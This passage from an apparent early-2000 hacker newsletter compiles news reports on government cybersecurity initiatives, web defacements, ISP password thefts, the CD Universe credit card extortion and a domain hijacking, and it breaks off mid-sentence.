@HWA 72.0 The EPA Cracks Down On Security 01/07/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Diane After an audit last month by the General Accounting Office the Environmental Protection Agency has taken several steps to beef up the security of its systems. The EPA has taken such steps as early termination of remote access, installing the latest patches, and reconfiguring the server to help shore up its systems. Federal Computer Week http://www.fcw.com/pubs/fcw/2000/0103/web-epa-01-06-00.html (Sorry, page requested returned a 404 - Ed) @HWA 73.0 FBI Still Investigating Y2K Cyber Threats 01/07/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The deputy assistant director of the FBI, Michael Vatis, told reporters that the agency has thwarted up to six Y2K related cyber intrusions and detected sophisticated automated tools aimed at knocking out computer networks. Reuters - via ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2418190,00.html?chkpt=zdnntop FBI investigating 20 Y2K threats Several incidents involved threats to blow up equipment such as power plants, while others involved cyber intrusions or detection of sophisticated hacker tools. By Reuters January 6, 2000 2:14 PM PT The FBI said Thursday it had moved to thwart up to 20 or so possible threats against targets such as power plants and computer networks during a heightened security watch that started before 2000 dawned. About a dozen "physical incidents" involved threats to blow up equipment such as electrical power plants, while another six or so involved cyber intrusions or detection of sophisticated ''hacker'' tools aimed at knocking out computer networks, deputy assistant director Michael Vatis told reporters. "On neither side did we think that this level of activity was particularly unusual," added Vatis, who oversaw a 24-hour headquarters command post tied to special year-end watches at all 56 FBI field offices. Asked to explain what he meant by the type of "physical" violence in question, Vatis said: "threats involving explosives or physical destruction of equipment or a plant of electrical power or something like that." Cases still under investigation All of the cases opened during the special year 2000 watch were still being investigated, an FBI spokeswoman, Debbie Wireman, said. The FBI published on Nov. 2 a study called Project Megiddo, which warned of possible year 2000-related violence by cults seeking to spark a biblical day of reckoning or by other domestic fringe groups. The study had warned that a The study had warned that any power outages or breakdowns sparked by the so-called Y2K computer quirk could play into conspiracists' fears of a plot to create a "one-world government." The project was dubbed Megiddo after a hill in northern Israel linked to Armageddon, the prophesied final battle between forces of good and evil. Attorney General Janet Reno did not answer directly when asked why she thought the fears reflected in the Megiddo report had not yet led to any big trouble. "The nice answer would be that there was no threat," she told her weekly press conference. "What we must all do, I think, is ... take reasonable precautions ... when we have specific information that can inform the American people, that we advise them." The FBI Y2K command post operated from Dec. 29 to Jan. 5. Vatis declined to comment on whether any suspected plots to strike New Year's Eve celebrated had been foiled or whether any originated abroad. He declined to discuss specifics of the physical threats under investigation or link any of them to any year 2000 issues. Bomb-making threat discussed He also declined to address the case of an alleged plot to smuggle bomb-making material into the United States from Canada. One Algerian man, Ahmed Ressam, has been charged while the authorities are investigating a suspected associate, Abdel Hakim Tizegha, held in Seattle on immigration charges. Vatis is director of the National Infrastructure Protection Center, or NIPC, an interagency group designed to detect and deter both cyber intrusions and physical attacks on infrastructure such as power grids, pipelines and water systems. On the computer security side, Vatis urged system administrators to download a new NIPC tool to scan for a hacker tool designed to cripple networks. The download was made available on the NIPC Web page on Dec. 30, after discovery of new so-called "distributed denial of service" tools aimed at systems using the Sun Solaris operating system. Vatis said three of the half dozen or so new FBI investigations were triggered in recent days when private companies, using the NIPC detection software, found signs their networks had been penetrated. The hacker devices -- such as one dubbed "trin00" and another called "Tribe Flood Network" or "tfn" -- are capable of enlisting multiple systems to amplify an attack on the ultimate target, Vatis said. @HWA 74.0 Clinton Wants Increased Computer Security 01/07/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by mortel President Clinton plans to announce a new initiative Friday to protect federal computers from infiltrators. Administration officials speaking on the condition of anonymity said Clinton's budget request for 2001 would seek additional funds for monitoring and protecting government computer systems. Associated Press - via Yahoo http://dailynews.yahoo.com/h/ap/20000107/pl/clinton_cyber_terrorism_2.html Friday January 7 12:03 AM ET Clinton Aims To Combat Hackers WASHINGTON (AP) - Stepping up vigilance against cyber-terrorism, President Clinton plans to announce a new initiative Friday to protect federal computers from infiltrators. Clinton has frequently expressed concern about the emerging threat that hackers, thieves and other governments pose to the nation's high-tech infrastructure. A top adviser Thursday included cyber-terrorism near the top of a list of threats facing America in the next century. ``I think there's a whole new realm of threat we're going to be dealing with,'' National Security Adviser Sandy Berger said in response to a questions after a National Press Club speech. ``The ability to take weapons of mass destruction across national borders with relative ease; the ability to attack our computers that run our infrastructure through cyber-terrorism.'' Administration officials speaking on condition of anonymity said Clinton's budget request for 2001 would seek additional funds for monitoring and protecting government computer systems. ``Now that we're past Y2K, we need to continue to insulate and secure our nation's computers,'' one official said. The official did not have any specific dollar figures, but USA Today reported in Friday's issue that the plan includes $2 billion to make the government's computer systems less vulnerable to attack. The new initiative builds on steps the administration announced last year. It would seek to develop new technologies, increase public and private cooperation against computer sabotage, improve training for government agents and boost protection of computer systems. ``It's creating a number of programs to train, detect and strengthen our ability to deal with cyber-terrorists,'' the official said. Last July, the administration announced that it was creating a government-wide security network to protect against hackers. The plan included an elaborate network of electronic obstacles, monitors and analyzers to watch for suspicious activity. The first 500 intrusion monitors were to be installed on non-military government computers early this year, and the full system was to be computed by May 2003. @HWA 75.0 Interview with Lloyd's of London and RailTrack Defacer 01/07/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evilwench Over the New Year, Lloyd's of London and a number of other sites including Railtrack UK, Eidos, and the Electronic Frontier Foundation (EFF) had their web pages defaced. MisterX who has claimed responsibility for these actions has given an interview with the UK Register. The UK Register http://www.theregister.co.uk/000106-000001.html Posted 06/01/2000 2:03pm by Mike Magee Railtrack, Lloyds of London Web hacker explains motives A member of a group which hacked into the Lloyds of London web site twice in one day has explained his intent in an exclusive interview with The Register. Over the New Year, Lloyds and a number of other sites including Railtrack UK, Eidos, and the Electronic Frontier Foundation (EFF) suffered attacks to their sites from groups appearing to act in concert. The hacker, who calls himself MisterX, also claims, in the interview below, that credit card transactions across the Internet are unsafe, and that he and his group have methods for hoovering up confidential data from Web sites. Q Hackers are generally described in the press as malicious or mischievous. Is there any serious intent to this activity, is it an intellectual exercise or is it just done for "fun" or to see if it can be done? ASome people do it for intellectual challenge, others do it with malicious intent. Some do it for fame amongst the hacker community, but all they get is disrespect. My hacks were to prove a point, which I think they have done. Many large UK organisations need to revise their security strategies, or lack of them. I defaced web sites to prove this point, but I could have easily got access to other systems and caused alot of damage. I am trying to make the community, in general, aware of the threats of cyber terrorism, and how real they are. Q What are the lessons large businesses should learn from their apparent inability to protect themselves against hacking? A They could have protected themselves from the attacks I used on them if only they had kept up to date on the latest computer security developments. Q Is there a worldwide network of people who share ideas and collectively hack sites, or is it more like small groups who have little contact with each other? A There is an underground scene, which shares files unreleased to the public. [These are] files on the latest security developments hot off the press, way before the public even knows these holes exist. But good morals normally lead them into the open. As for web site defacement it is generally small groups that do this, trying to compete against each other, and these groups are not very well respected within the mainstream community. Q Are the legal penalties against hacking that many governments have instituted any deterrent at all? Are the legal penalties too heavy handed? A Some governments have ridiculous penalties, as in the case of two Chinese hackers who stole a measly amount from a bank and were sentenced to death. The UK is more lax on the law in this respect :) I would just like to delve slightly into e-commerce. I warn the public about the drastic dangers of shopping online. I, personally, could break into a number of highly used e-commerce sites and steal the credit card numbers of every customer that ever shopped there. The head of Novell that shopped online and had his credit card number snarfed, said it was due to cookies. Well, the truth is someone most probably broke into one of the sites he used it on and his wasn't the only card abused, yet the site probably would not have even know the attack had taken place, and could still be taking place. Shopping online is not safe at the moment, despite what the big companies say, and which are just trying endlessly to grab your money, and see as the Internet as just another means of doing so. They tell you that they care about your security, OK, I grant them that, maybe they do. It is not in their hands though. As I mentioned earlier, hackers have resources unavailable to the general public, meaning a system administrator may think his site is secure, but, some one some where has a method of breaking in. ® Lloyds of London, Met Office follow Railtrack UK in hack attack @HWA 76.0 Pac Bell Hit by Possible Cyber Intruder 01/10/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by The_Question Law enforcement officials recently notified PacBell that persons currently in custody had gained access to the passwords of some of the ISPs California users. PacBell has gone so far as to force users to change their passwords. PacBell has said that users who do not change passwords by January 14 will be locked out of their account. It is unknown how many accounts are actually effected or who the persons in custody are. Pacbell did say that no unusual account activity has been noticed. (It is a little late to change passwords now, especially if you have no idea how the list was compromised in the first place.) ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2419466,00.html?chkpt=zdnntop Teen hacks 27 ISPs, gains root access Pacific Bell Internet Services not the only ISP to have its network compromised by a teen hacking ring. By Robert Lemos and Sean Silverthorne, ZDNet News UPDATED January 10, 2000 6:13 PM PT A 16-year-old hacker affiliated with the cybergang known as Global Hell compromised at least 27 Internet service providers late last year, stealing passwords and, in some cases, destroying data, according to details of a police investigation released Monday. The organizations that were compromised were "mainly in the U.S.," said Damian Frisby, a detective with the Sacramento Valley Hi-Tech Crime Task Force. "A lot of them were private Internet companies, law schools and colleges, and a couple were backbone Internet providers. The hackers were able to gain root access." The facts in the case came three days after Pacific Bell Internet Services notified an unknown number of customers that their passwords had been compromised and that they have until Jan. 14 to change them. In an e-mail message sent Friday to customers, Valeri Marks, president and CEO of Pacific Bell Internet Services, said that a band of hackers targeted a number of its California customers. "We were recently notified by law enforcement officials that a ring of hackers, currently in police custody, had gained access to the password information of some California ISP users. Although there has been no indication of any account abuse, you should change your password immediately," the notice read. One teen charged In fact, the police have charged just one person, a 16-year-old West Hills, Calif., resident, with several felonies including unlawful access and grand theft. According to Frisby, the cyberthief had connections with a notorious online group known as Global Hell, several members of which were arrested last fall by federal law enforcement officials. The original investigation followed a Dec. 7, 1999, complaint by Innercite, an El Dorado County Internet service provider, which reported that its servers had been compromised and several files deleted. Innercite also reported that its service had been used to perform network scans of computers at Sandia and Oakridge National Laboratories. Pacific Bell went beyond issuing a simple warning, saying that subscribers would be required to change their passwords or face being shut out of their accounts. "For your protection, if you have not changed your password by January 14, 2000, Pacific Bell Internet will require that you call in to change it in order to access your account," the e-mail stated. For good reason: More than 200,000 passwords had been stolen from the California Internet service provider, though the police found that only 63,000 had been decrypted at the time of arrest, said Frisby. Pacific Bell provided a Web address where users could change their passwords. A Pacific Bell support technician confirmed the action Saturday but could not provide details. No other information has been made available on Pacific Bell's site. Although hack attacks on ISPs are not uncommon, it is more rare for a service provider to require customers to change their passwords. So far, none of the other providers has come forward with details about the problem. @HWA 77.0 Virgin ISP Issues New Passwords 01/10/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by macwizard After discovering someone attempting to break into the email system Virgin has forced 170,000 of its 800,000 users to change their passwords. Officials claim that no security breach happened but that someone has attempted to break in. (If no one got in why bother to change the passwords? This makes no sense.) BBC http://news.bbc.co.uk/hi/english/sci/tech/newsid_597000/597229.stm Hacker scare hits Virgin Net Security "not breached", but passwords must be changed Thousands of Virgin e-mail users are being issued with new passwords after the company found a hacker had been attempting to tap into its mailing system. More than 170,000 of Virgin Net's 800,000 UK customers had their service temporarily withdrawn at the weekend. A notice was posted on Virgin's official website warning users of the potential breach, and giving step-by-step instructions as to how they could change their passwords. Individual letters were also being sent out to inform anybody who had not logged on since the problem was detected. A spokesman said on Monday: "No actual security breach has happened, but we discovered someone was attempting to hack in. "Because we were able to work out how they were trying to do this, we were able to isolate a maximum of 25% of our customers who might have potentially been affected. "Their e-mail facilities have been temporarily switched off and we are in the process of creating new passwords for them. "It is important to emphasise that, in the event, no-one's security has actually been breached." The spokesman added that all those concerned were a certain "type" of customer, but he declined to identify which one. Microsoft scare The Virgin security scare comes just four months after Microsoft was forced to temporarily shut down e-mail links for 40m customers worldwide, following a breach of the company's Hotmail security system. On that occasion, a group of seven programmers calling themselves Hackers Unite later e-mailed online news service Wired to claim responsibility for the breach, which they said was intended to demonstrate the inadequacy of Hotmail's defences. Virgin Net user John Holland learnt of the potential breach when he tried to retrieve his e-mail messages on Sunday, and found his password was being rejected. He said: "For me it wasn't such a big problem, but for some customers who are trying to run businesses using e-mail they could have missed out on dozens of messages by the time they receive their letter telling them about the situation. "A potential breach doesn't bother me particularly because I don't have that much confidential information coming over, but clearly the fact there has been a potential breach is a cause for concern to some people." @HWA 78.0 CD Universe Customer Info Compromised 01/10/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Brian and birgir A Russian cyber-intruder using the alias Maxim tried to blackmail the online vendor CD Universe in December by threatening to release credit card data he had stolen off the site. The extortionist said that he sent a fax to CD Universe early in December saying "Pay me $100,000 and I'll fix your bugs and forget about your SHOP FOREVER, or I'll sell your cards and tell about this in the news." When CD Universe did not respond to his threats he posted 25000 credit card details on a website and sold the rest through chat rooms on IRC and other underground venues. Internetnews.com http://www.internetnews.com/ec-news/article/0,1087,4_278091,00.html Failed Blackmail Attempt Leads to Credit Card Theft January 9, 2000 By Brian McWilliams InternetNews.com Correspondent E-Commerce News Archives In what may be the largest credit card heist on the Internet, an 18-year-old Russian cracker claims to have stolen thousands of credit card numbers from an online store and dispensed them to visitors of his Web site. Before it was taken offline early Sunday morning, the rogue site, a page of which has been captured here, had doled out more than 25,000 stolen card numbers. Also included with the numbers were expiration dates and cardholder names and addresses, according to a counter on the page. With the click of a button, visitors could launch a script that purportedly obtained a valid credit card "directly from the biggest online shop database," according to a message at the site. The cracker, who goes by the nickname Maxus, claimed in an e-mail to InternetNews.com to have breached the security of CDuniverse.com, an online music store operated by eUniverse, Inc. of Wallingford, Conn. Maxus said he had defeated a popular credit card processing application called ICVerify, from CyberCash (CYCH) and obtained a database containing more than 300,000 customer records from CDuniverse. As proof of his exploit, Maxus e-mailed a file to InternetNews containing dozens of user names and passwords for accessing customer order status information at CDuniverse. One of the victims, Greg Wilson of Binghamton, N.Y., confirmed that he had shopped at the online music store over a year ago. According to Wilson, he was contacted by his credit card company's fraud division last week after someone had attempted to make an authorized charge to his card. Another victim, Charles Vance of Marietta, Ga. said he had purchased CDs from the company in the past, but had recently cancelled the card on file for unrelated personal reasons. Cybercash officials disputed the hackers report, saying their IC Verify product was not at issue. "CyberCash's ICVERIFY product is a pc-based payment system, not a Web-enabled product and is not being used by CD Universe on its Web site. Therefore, the credit card information cited in recent coverage could not have come from ICVERIFY. "Since we're not involved in this, any other questions should be addressed to law enforcement officials or CD Universe, as it is not appropriate to comment further due to the legalities surrounding this issue." Maxus said that he decided to set up the site, titled Maxus Credit Cards Datapipe, and to give away the stolen customer data after officials at CDuniverse failed to pay him $100,000 to keep quiet about the security hole. Maxus claims the company agreed to the payment last month, but subsequently balked at initiating a wire transfer to a secret bank account because it might be noticed by auditors. After a week passed with no further contact from the company, Maxus said he put up his site and announced its presence Dec. 25th on an Internet Relay Chat group devoted to stolen credit cards. Soon after launching his site, Maxus said it became so popular with credit card thieves that he had to implement a cap to limit visitors to one stolen card at a time. The Internet service provider which hosted the Maxus site, Lightrealm Inc., of Kirkland, Wa, took the Maxus site down sometime early Sunday morning. Lightrealm was acquired by Micron Electronics (MUEI) last October. According to Elias Levy, chief technology officer of Internet security information firm SecurityFocus.com, which first publicized the existence of the Maxus site, the incident "is very disturbing. It realizes the fears people have about online commerce." But Levy pointed out that because card holders are usually only responsible for first $50 in fraudulent charges, the real danger in Internet credit card fraud falls on online merchants and credit card companies. "The Internet is not more dangerous for consumers. It allows a criminal to break into a single site and obtain not one credit card, but possibly a database of all credit cards of that site's customers," Levy said. Apprehending Maxus will not be easy, said Richard M. Smith, an online security expert in Brookline, Mass., who helped federal agents track down the author of the Melissa virus, David L. Smith. Maxus appears to move about online using stolen accounts and relays his email through other sites to conceal the originating Internet protocol address, said Smith. "It's possible he could have slipped up somewhere along the way, but I think he's pretty free and clear and it's near zero that they will catch him," Smith said. A guest book at the Maxus site contained dozens of entries from visitors, many of them in Russian. According to BizRate, a service which collects feedback from online shoppers, CD Universe rates highly overall with excellent customer satisfaction scores for nearly all dimensions of its service. @HWA 79.0 Northwest Notifies Customers of Security Breech 01/10/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond After routine maintenance on the NorthWest Airlines web site administrators forgot to turn the security systems back on. NorthWest has said that it does not know how long customer information was vulnerable or if personal information such as credit card numbers where compromised. The company said that it is taking the unprecedented step of notifying all effected customers anyway. Associated Press - via Northern light http://library.northernlight.com/ED20000107690000013.html?cb=0&dx=1006&sc=0#doc Story Filed: Friday, January 07, 2000 8:23 PM EST EAGAN, Minn. (AP) -- Northwest Airlines is alerting customers who recently made purchases on its Frequent Flier Web site that their credit card numbers and personal information were unprotected because of a programming glitch. Northwest spokesman Jon Austin said the risk of hackers getting the information is small, but one the airline is taking seriously. ``We want to be able to take care of this ourselves because it is a problem we created and one we want to help resolve,'' he said. The problem arose when a computer programmer doing maintenance on the site put the system back on line, but forgot to restore the security system. When a customer didn't see a small ``lock'' icon as he placed his order in mid-December, he notified the carrier that the information was not secure. Austin did not say exactly how long the site was unsecured or how many passengers were affected. Northwest is now notifying passengers who made purchases at the time about the security lapse. Copyright © 2000 Associated Press Information Services, all rights reserved. @HWA 80.0 Parse Issues Statement About Cancellation 01/10/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Elyn The unexpected cancellation of ParseTV last week by online TV broadcaster Pseudo has left a lot of people wondering what the hell happened. Host of the show Elyn Wollensky has released a brief statement hopefully explaining the situation. Statement from ParseTV Host Parse Issues Statement About Cancellation http://www.hackernews.com/press/parsetv.html Date: 1/8/00 7:28 PM Received: 1/8/00 8:07 PM From: Ewidgb@xxxx.com To: contact@hackernews.com Dear HNN, After several e-mails, phone calls, & comments at last nights 2600 meeting, I think I need to issue a brief statement regarding Parse and requesting that no one deface Pseudo or try to do anything to their archives. I waited for Pseudo to issue a statement, but I guess they haven't, so here it is: The hosts of ParseTV are grateful for all the notes and calls regarding the show & concern for our future. While we have not been informed of the official reason for Pseudo's cancellation of the ParseTV channel, we are grateful to Pseudo for the opportunities that they offered us. We are currently discussing potential opportunities with several other webcasters and cable networks, which would allow us to take the show to a new level both in quality and the content offered. Because of these discussions, we request that no one act out in a rash way. Particularly by defacing the Pseudo site or by attempting to attack their archives or databases. Any defacement, denial of service attack, or database tampering would only harm our chances of being acquired by a respected news or webcast service. And, while it is great to be able to come to the negotiation table with an existing loyal and supportive audience base, it is equally important that our audience be seen as reliable and trustworthy. Have no fear that we are trying to make a move that will benefit the integrity of the show, and allow us to continue to grow the quality and content that we worked so hard to pull together. Once again, we would like to thank everyone who has written and called for your continued support and encouragement. If you would like to reach us directly, you can contact Elyn at solaar@hushmail.com & Mike at editor@aviary-mag.com. Elyn Wollensky & Mike Hudak Thanks @HWA 81.0 HACK.CO.ZA DoS attack causes ISP to remove site ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The well known hack.co.za website has been under attack for several days forcing the ISP to take down the site's connectivity. There is no word yet as to why the site remains down after the DoS attacks stopped or who was behind the attacks but gov-boi is now looking for a new provider to host the site. If you can offer hosting (free) for this premiere security site, please contact us and we'll get you in contact with gov-boi. Hopefully things will work out and the site will be back online shortly. - Ed @HWA 82.0 Comments on Linux Security 01/10/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by white vampire Jon Lasser began the Bastille Linux Project in order to harden the security of Red Hat Linux, the distribution he uses at work. In the process, he began looking at the other distributions to see how they handle security updates, and he was not at all happy with what he found. In a Freshmeat editorial, he shares his concerns and explains why it matters to you even if you do all your security monitoring for yourself. Freshmeat http://freshmeat.net/news/2000/01/08/947393940.html @HWA 83.0 PirateCity.com Wins Domain Battle with FortuneCity.com 01/10/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by The Overlord Free webspace provider Fortunecity.com has axed plans to take the Piratecity.com community to court for so called use of FortuneCity's Proprietary Interests. PirateCity is a free web host provider to the underground community. It is rumored that continuous attacks on their website by pro-PirateCity supporters was too much to make the action worthwhile. PirateCity thanks all those who supported their cause but say they never promoted malicious cyber activity as a means to get their message across. PirateCity http://www.piratecity.com/news.htm @HWA 84.0 Taiwan Claims 1000 Viruses In Arsenal 01/10/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Taiwanese Defense Ministry official Lin Chin-ching has been quoted as saying that Taiwan has 1000 viruses in its arsenal in preparation for a cyber war with China. (While there is no evidence to prove or disprove this statement it sounds like propaganda to me.) Bloomberg http://quote.bloomberg.com/fgcgi.cgi?ptitle=U.S.%20Economy&s1=blk&tp=ad_topright_econ&T=markets_fgcgi_content99.ht&s2=blk&bt=blk&s=27ac19370aa3ca9a7103812a68e1d077 Economy and Politics Sat, 15 Jan 2000, 8:51am EST Taiwan Has 1,000 Computer Viruses to Fight Cyber War With China, AFP Says By Peter Harmsen Taipei, Jan. 9 (Bloomberg) -- Taiwan's military is preparing for cyber warfare with China and has developed about 1,000 computer viruses for that purpose, Agence France-Presse reported, quoting the Liberty Times. ``Should the People's Liberation Army launch electronics warfare against Taiwan, the military, armed with about 1,000 computer viruses, would be able to fight back,'' the paper quoted Defense Ministry official Lin Chin-ching as saying, according to AFP. One of the scenarios considered by Taiwan's Defense Ministry is for China to invade Taiwan's computer systems and alter the outcome of the March presidential polls, AFP said. After tensions between Taiwan and China rose in the middle of last year, cyberspace was one of the main scenes of hostility, with Internet users trading insults and hackers intruding on government Web sites. (Agence France-Presse, 1/9) @HWA 85.0 Reno Announces LawNet 01/11/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The US attorney general, Janet Reno, has proposed the creation of a national computer crime-fighting network dubbed LawNet. The network would consist of a new nationwide computer system for information sharing and the creation of new forensic computer labs around the country. The network would work with law enforcement agencies on the federal state and local level. LA Times http://www.latimes.com/business/cutting/20000110/t000002956.html Associated Press - via MSNBC http://www.msnbc.com/news/355783.asp Reno to Discuss Plan to Bolster Efforts Against Cyber-Crime Law: The attorney general is expected to outline a proposal that includes a nationwide network that would facilitate investigations. By GREG MILLER, Times Staff Writer U.S. Atty. Gen. Janet Reno is expected today to propose the creation of a national computer crime-fighting network designed to enable swift cooperation among law enforcement agencies on crimes that often cross multiple jurisdictions and unfold in a matter of minutes, according to officials familiar with a speech Reno is scheduled to make at a Palo Alto conference. The network is part of a series of initiatives Reno is expected to outline at a time when law enforcement agencies across the country are struggling to keep up with technology's expanding role as a tool of crime. The initiatives would overhaul the way law enforcement agencies at every level work together to investigate crimes involving computers. One federal official who spoke on condition of anonymity said that coordination among agencies these days is often hit and miss at best. Reno's proposals also will include the establishment of a new nationwide computer system for sharing investigative information and the creation of new forensic computer labs around the country that would combine personnel from federal, state and local law enforcement agencies. She is not expected to provide much information on how such measures might be financed when she unveils them in a keynote speech today before members of the National Assn. of Attorneys General. The group is convening in Silicon Valley to discuss the impact of the Internet and technology on law enforcement. Many details of Reno's proposals remain unclear, including specifically how the plans would be funded. But officials familiar with the plans say they are a high priority for the Justice Department and the Clinton administration. In fact, Reno's proposals come in the wake of a series of computer-related initiatives the White House has announced in recent months. Last week, for example, President Clinton proposed allocating $91 million to develop new programs to protect the nation's computer networks from intrusion by hackers. Part of that funding would go toward the creation of a Federal Cyber Service, analogous to the R.O.T.C., that would enlist college computer science students to help the government fend off computer attacks by terrorists or foreign governments. But while the threat of cyber-terrorism has so far been more theoretical than actual, Reno's proposals are aimed at shoring up law enforcement's ability to combat everyday crime in the Information Age. The centerpiece of Reno's plan is decidedly low tech and relatively low cost because it involves no new computer systems or technical infrastructure. Rather, it calls for the creation of a network of specially trained computer crime coordinators at law enforcement agencies around the country. Designated coordinators would be available at a moment's notice and would be experts in the nuances of computer-related investigations. As an example, officials said such coordinators would be equipped to move quickly in serving court orders to obtain account information or request traces on calls or data transmission from local telecommunications companies and Internet service providers. That sort of coordination is increasingly commonplace in large metropolitan areas, such as Los Angeles, where the Police Department and other local agencies operate special high-tech crime units. But federal officials say smaller cities and agencies are far less likely to be equipped to assist in a computer investigation on short notice and often merely refer such requests for help to federal authorities. The second of Reno's proposals is more complicated, costly and uncertain. She is expected to call for a secure national computer system in which law enforcement agencies can both supply and access information on ongoing investigations of crimes ranging from hacking attacks to drug trafficking. The federal government has already created a network called the National Crime Information Center, which allows state and local authorities to tap federal crime databases. But that network does not allow state and local authorities to contribute information, and it has come under heavy criticism because it suffered numerous delays and cost millions of dollars more than initial estimates. The third major proposal expected from Reno involves the creation of jointly operated forensic computer crime labs around the country. Such labs would be staffed by computer experts trained in analyzing hard drives and other computer systems for digital evidence that is increasingly crucial in prosecuting white-collar crimes from hacking to health-care fraud. The FBI already operates such labs in most major metropolitan areas around the country. But officials said that those labs are overwhelmed by existing caseloads and that few state and local agencies have comparable facilities. Reno's proposal would replicate a unique arrangement in San Diego, where a forensic computer lab operates using personnel and resources from the FBI and the Secret Service as well as the San Diego District Attorney's Office and Police Department. Officials acknowledged that such a plan would require federal funding but declined to discuss how Reno planned to pay for the project except to say that is under consideration for the Justice Department's upcoming budget proposal. @HWA 86.0 Domains Redirected 01/11/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The compromised password of an administrator at a New Jersey ISP, HighSpeedNet, allowed a malicious intruder to change the domain entries of several sites including Emory University, Exodus Communications, Colorado University, Corecomm and Dreamcast. Most sites restored service within a few hours. C|Net http://news.cnet.com/news/0-1005-200-1519750.html?tag=st.ne.1002.bgif?st.ne.fd.gif.j Widespread domain hack hits Emory University, others By Patricia Jacobus Staff Writer, CNET News.com January 11, 2000, 4:00 a.m. PT A hacker hijacked several Internet addresses over the weekend, confusing computer users and inconveniencing the organizations involved. All but two of the domain names, which were redirected to another company's Web site, were restored by yesterday afternoon. But some organizations, like Emory University in Atlanta, were still struggling to get their Web sites back in order, they said. Somehow, someone tapped into the universal registry operated by Network Solutions (NSI) and changed at least nine Net addresses redirecting users to the Web site of a New Jersey company called HighSpeedNet.net, said Jan Gleason, vice president of communications at Emory University. NSI representatives could not immediately be reached for comment. The operator of HighSpeedNet, a 19-year-old software technician, explained he was not the culprit, but a victim. "There's no reason for anyone to believe me," Ralph Hughes said in an interview yesterday afternoon. "But somebody got a hold of my password and authorized all these changes. There really wasn't anything I could do about it." This is the third time in a month that there have been major problems surrounding domain names. In late December, consumers complained that the universal software used to reserve Net names occasionally went on the blink, causing some people to lose out on a sought-after name. And last week, several registrars had to recall hundreds of domain names sold over the past few months with trailing or leading hyphens in the addresses. The hyphens were not allowable, but somehow NSI's registry accepted the domains anyway. Other companies affected by the hacker's weekend work included Exodus Communications, Colorado University, Corecomm and Dreamcast. Hughes said he first learned of the problem Saturday morning when he reported to work and checked his email. "There was a notice that all these domains were transferred to me," he said, somewhat exasperated. Shortly thereafter he discovered that the high traffic being redirected to HighSpeedNet was causing problems for his viewers, who couldn't get into chat rooms or click around the Web site. Hughes said he quickly called all the companies affected in an attempt to repair the problem. The universities had to wait until today to get help. NSI provides service for ".edu" domains only during the week. For Emory University, that meant faculty members and administrators couldn't use email, and prospective students weren't able to check out the school's site. "We're not in classes right now, so for us it was just a few minor headaches," Gleason said. "But we're told it's going to take until tomorrow to fix the problem, which has been going on for 60 hours now. On the Internet 60 hours is a lifetime." The incident has sparked a renewed interest by college advocates to demand better service for ".edu" domains. Universities don't pay a fee for the Internet addresses and in turn don't get seven-day-a-week service. Last year, a group called Educause, which represents college network administrators, vowed to jump into the Internet deregulation game, hoping to gain control of the names reserved for universities. Their efforts are still in the works. @HWA 87.0 Report on SuperComputer Sale to China Released 01/11/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench An Energy Department report on the sale of a decommissioned supercomputer (Intel Paragon XPS) by Sandia National Laboratories to a Chinese national has been released. The sale, in 1998, worried officials that the machine could end up in China. The machine was later repurchased for three times the original sale price. The report indicates that security was not compromised but does paint a disturbing picture of how sensitive equipment was handled at the lab. Washington Post http://www.washingtonpost.com/wp-srv/WPcap/2000-01/09/047r-010900-idx.html HNN Archive for August 2, 1999 http://www.hackernews.com/arch.html?080299 Defense Lab's Computer Sale Risked Security, Probe Finds By Bradley Graham Washington Post Staff Writer Sunday, January 9, 2000; Page A14 One of the nation's leading defense laboratories sold one of the world's 100 fastest computers at a bargain-basement price to a U.S. firm controlled by a Chinese citizen in late 1998. Ten months later, fearing that the supercomputer's parts could end up in China, lab officials hurriedly repurchased the machine at nearly three times the sale price. In a detailed report released last week, the Energy Department's inspector general faults officials at Sandia National Laboratories for ignoring risks to national security in the botched deal. While finding no evidence that security actually was damaged, the report paints a damning picture of the lab's handling of a piece of advanced technology used during the mid-1990s in highly classified nuclear weapons research. The new report concludes that the sale took place without the knowledge of senior lab and administration officials. Those involved in the deal treated the computer as just another item of surplus equipment, neglected to apply controls required for potential exports and failed to review operating manuals and data storage disks sent with the computer, the report says. Soon after the sale, the report reveals, lab officials dismissed suspicions voiced by the computer's manufacturer, Intel Corp., that the buyer might transfer some parts to China. Only when press reports last summer called attention to the sale and highlighted the buyer's Chinese 